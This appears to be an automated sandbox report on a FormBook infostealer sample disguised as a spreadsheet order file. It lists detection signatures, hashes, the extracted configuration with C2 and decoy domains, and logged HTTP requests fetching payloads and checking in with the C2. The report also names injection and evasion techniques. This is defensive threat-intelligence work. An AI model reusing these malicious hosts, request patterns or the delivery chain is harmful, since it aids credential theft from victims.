Windows Analysis Report
RFQ Order PT502818.xls.vbs

Overview

General Information

Sample name: RFQ Order PT502818.xls.vbs
Analysis ID: 1649124
MD5: 2bd4b9968087610996ce5ebf4d54daf7
SHA1: 765b890da74d5abefcee81d348eca4b02532bb63
SHA256: bd3a12a40c2387cebef93cb3030ebcf879e43683424069898e5a0053100787fa
Tags: Formbook, vbs, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected Powershell download and execute
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Cscript/Wscript Uncommon Script Extension Execution
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses an obfuscated file name to hide its real file extension (double extension)
Uses netsh to modify the Windows network and firewall settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification


AV Detection

Source: http://www.ecommerce-25754.bond Avira URL Cloud: Label: malware
Source: https://ofice365.github.io/1/test.jpg09 Avira URL Cloud: Label: malware
Source: http://www.ecommerce-25754.bond/mtpi/ Avira URL Cloud: Label: malware
Source: http://www.ocgccv.info/mtpi/www.cameronreitsma.net Avira URL Cloud: Label: malware
Source: http://www.ocgccv.info/mtpi/ Avira URL Cloud: Label: malware
Source: 00000008.00000002.2654798948.0000000000CB0000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.cameronreitsma.net/mtpi/"], "decoy": ["jpsjlpszv1emibow.cyou", "iyfeszfot8zdkmkb.cyou", "adutils-e2e-test3-4357742.zone", "protecttech.shop", "atneb.autos", "exclusivepiscinas.net", "jan-aadhaar.shop", "absorbalineraquatic.cloud", "warehouse-092.today", "authme.now", "lekido.tech", "etimestrips.store", "astilbeastiteaubades.cloud", "5335588a59.buzz", "nw01erf.pro", "tokenpool.xyz", "b2cstore.net", "emiuniv.online", "yylmhzt.xyz", "jessicabyheart.store", "031235131.xyz", "hopeclothing.shop", "aureliussoft.net", "testimonial.buzz", "pemimpi.xyz", "ayagabi.info", "kkk17.yachts", "251014.pink", "car-select.online", "warehouse-jobs-67806.bond", "hodl365.xyz", "woodenhandicrafts.shop", "ocgccv.info", "truow.life", "liga200.sbs", "swkxxkhx883ebi8i.xyz", "88z1.fun", "estatelawyers8.xyz", "pokomampollanracial.cloud", "ayap.xyz", "omewealth.shop", "polaceres4d.xyz", "menopausemarketing.pro", "mobile-homes80.shop", "hcywyj10.xyz", "6614.bid", "topbitcoin.xyz", "joker878.live", "goodelectronics.club", "mzwdg.autos", "gamefipayment.xyz", "afrowears.store", "ebsymptomsandtreatment.today", "p6y5m.skin", "wyndown.net", "41883.ltd", "ecommerce-25754.bond", "23461.bid", "play-rikvip.club", "focusmentorn.pro", "holymountain.xyz", "cbvu.autos", "tires-nl-1428.today", "btvjirz612.vip"]}
Source: RFQ Order PT502818.xls.vbs Virustotal: Detection: 13%
Source: Yara match File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2654798948.0000000000CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1641106278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2654692262.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2654885406.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Neural Call Log Analysis: 100.0%
Source: unknown HTTPS traffic detected: 185.199.109.153:443 -> 192.168.2.4:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 16.15.192.227:443 -> 192.168.2.4:49721 version: TLS 1.2
Source: Binary string: netsh.pdb source: RegAsm.exe, 00000006.00000002.1654119281.0000000003030000.00000040.10000000.00040000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1644030200.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1644030200.000000000149A000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000008.00000002.2654921353.0000000000E30000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: netsh.pdbGCTL source: RegAsm.exe, 00000006.00000002.1654119281.0000000003030000.00000040.10000000.00040000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1644030200.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1644030200.000000000149A000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.2654921353.0000000000E30000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000006.00000002.1656803800.0000000003090000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.1641084267.000000000314E000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.1643019869.00000000032F3000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.2655735535.000000000363E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.2655735535.00000000034A0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb source: explorer.exe, 00000007.00000002.2670125824.0000000010F8F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.2656472532.00000000039EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.2655145082.0000000002F46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000006.00000002.1656803800.0000000003090000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000008.00000003.1641084267.000000000314E000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.1643019869.00000000032F3000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.2655735535.000000000363E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.2655735535.00000000034A0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb4 source: explorer.exe, 00000007.00000002.2670125824.0000000010F8F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.2656472532.00000000039EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.2655145082.0000000002F46000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then pop ebx 6_2_00407B23
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop ebx 8_2_00B07B23

Networking

Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49725 -> 154.198.239.29:80
Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49725 -> 154.198.239.29:80
Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49725 -> 154.198.239.29:80
Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49727 -> 91.195.240.19:80
Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49727 -> 91.195.240.19:80
Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49727 -> 91.195.240.19:80
Source: Network traffic Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 185.199.109.153:443 -> 192.168.2.4:49715
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.19 80
Source: C:\Windows\explorer.exe Network Connect: 154.198.239.29 80
Source: Malware configuration extractor URLs: www.cameronreitsma.net/mtpi/
Source: global traffic HTTP traffic detected: GET /1/test.jpg HTTP/1.1 Host: ofice365.github.io Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ebgApAm.txt HTTP/1.1 Host: leka25.s3.us-east-1.amazonaws.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mtpi/?wR=LDlZA8c8ccZsWXrHXJy43Rqas/rkEJBbKG585dTsIiDnmU9iwQgUnyEkHdWjaY+U5WHy&V4=jDKdPfM0e HTTP/1.1 Host: www.nw01erf.pro Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mtpi/?wR=WpZS+bw4JXH0y118vk5hQTOL+1r6bbOHRTASiZs1K9uS3ePifMNiBK1a8R3amt8aiouh&V4=jDKdPfM0e HTTP/1.1 Host: www.menopausemarketing.pro Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 185.199.109.153 185.199.109.153
Source: Joe Sandbox View IP Address: 91.195.240.19 91.195.240.19
Source: Joe Sandbox View ASN Name: CNSERVERSUS CNSERVERSUS
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\explorer.exe Code function: 7_2_0F3E3F82 getaddrinfo,setsockopt,recv, 7_2_0F3E3F82
Source: global traffic DNS traffic detected: DNS query: ofice365.github.io
Source: global traffic DNS traffic detected: DNS query: leka25.s3.us-east-1.amazonaws.com
Source: global traffic DNS traffic detected: DNS query: www.nw01erf.pro
Source: global traffic DNS traffic detected: DNS query: www.hopeclothing.shop
Source: global traffic DNS traffic detected: DNS query: www.menopausemarketing.pro
Source: global traffic DNS traffic detected: DNS query: www.etimestrips.store
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden content-length: 93 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
Source: explorer.exe, 00000007.00000000.1523845606.0000000009B49000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1523845606.0000000009B25000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072108638.0000000009B25000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071685840.0000000009B66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2662764839.0000000009B49000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: explorer.exe, 00000007.00000000.1523845606.0000000009B49000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1523845606.0000000009B25000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072108638.0000000009B25000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071685840.0000000009B66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2662764839.0000000009B49000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000007.00000000.1523845606.0000000009B49000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1523845606.0000000009B25000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072108638.0000000009B25000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071685840.0000000009B66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2662764839.0000000009B49000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000007.00000000.1523845606.0000000009B06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072108638.0000000009B06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2662764839.0000000009B06000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crl
Source: powershell.exe, 00000003.00000002.1517714752.000002B59E2B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000007.00000002.2662578656.00000000097F0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2661830719.0000000008A60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2660742017.00000000081B0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: powershell.exe, 00000001.00000002.1815974500.000001A600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1517714752.000002B59E091000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.23461.bid
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.23461.bid/mtpi/
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.23461.bid/mtpi/www.jpsjlpszv1emibow.cyou
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.23461.bidReferer:
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.afrowears.store
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.afrowears.store/mtpi/
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.afrowears.store/mtpi/www.tokenpool.xyz
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.afrowears.storeReferer:
Source: powershell.exe, 00000003.00000002.1517714752.000002B59E2B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.btvjirz612.vip
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.btvjirz612.vip/mtpi/
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.btvjirz612.vip/mtpi/www.lekido.tech
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.btvjirz612.vipReferer:
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.cameronreitsma.net
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.cameronreitsma.net/mtpi/
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.cameronreitsma.net/mtpi/www.emiuniv.online
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.cameronreitsma.netReferer:
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ecommerce-25754.bond
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ecommerce-25754.bond/mtpi/
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ecommerce-25754.bond/mtpi/www.btvjirz612.vip
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ecommerce-25754.bondReferer:
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.emiuniv.online
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.emiuniv.online/mtpi/
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.emiuniv.online/mtpi/www.23461.bid
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.emiuniv.onlineReferer:
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.etimestrips.store
